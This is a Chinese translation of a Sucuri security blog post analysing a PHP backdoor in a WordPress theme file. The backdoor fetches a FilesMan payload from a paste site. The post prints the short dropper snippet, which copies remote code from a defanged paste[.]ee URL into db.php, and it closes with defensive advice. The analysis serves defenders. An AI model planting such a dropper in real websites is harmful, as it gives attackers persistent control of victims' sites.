后门使用粘贴网址来保存payload

ang010ela 技术 2018年10月4日发布

导语:本文介绍一种不常见的、简单但有效的后门,后门会使用粘贴的网址来保持payload。

网站后门

后门是攻击者故意留下用于之后访问站点的恶意软件。黑客喜欢在不同的位置注入代码来增加保持对网站控制权的机会,这样就可以继续感染受害者网站了。

今年都在讨论解码含有PHP函数的复杂恶意软件的新方法。常见的PHP函数有:

· eval, 把一段字符串当作PHP语句来执行

· create_function, 主要用来创建匿名函数

· preg_replace, 正则查找替换函数

· assert, 断言函数

· base64_decode.

根据最新的网站被黑报告,过去的一年:

· 被黑的网站中有71%隐藏有基于PHP的后门。

· 这些后门的有效性来源于大多数网站扫描技术的绕过。

不常见的后门

不常见的后门看似合法代码,大多数的恶意软件扫描器都无法扫描到。

在应急响应调查中,研究人员发现一个小的、简单、但有效的后门。

后门的内容会上传到wp-content/themes/buildup/db.php文件,看起来是这样的:

<?php
if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {
echo "Copy_success";
}else{
echo "Copy_failed";
}
?>

这一段代码会从hxxps://paste[.].ee处下载全部的恶意软件。

有一款免费的工具会混淆下载的代码,这样的工具对恶意软件开发者来说是很容易的。研究人员还发现一些合法的代码也会使用这种免费的工具。

 图片.png

混淆的代码从网站下载恶意软件

反混淆后就获得了可读的代码:

 图片.png

从中可以看出这是FilesMan后门的一个副本,FilesMan后门是隐藏在文件系统中的后门,会使其在不访问服务器或日志的情况下很难被发现。

如何避免网站后门?

后门很难发现,也很难去除。首先,研究人员建议经常性的监控日志是否有不常见的行为。其次,为了避免网站被感染,研究人员建议应用文件完整性监控和WAF这样的安全措施。

本文翻译自:https://blog.sucuri.net/2018/09/backdoor-uses-paste-site-to-host-payload.html如若转载,请注明原文地址: http://www.4hou.com/technology/13720.html
点赞 5
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论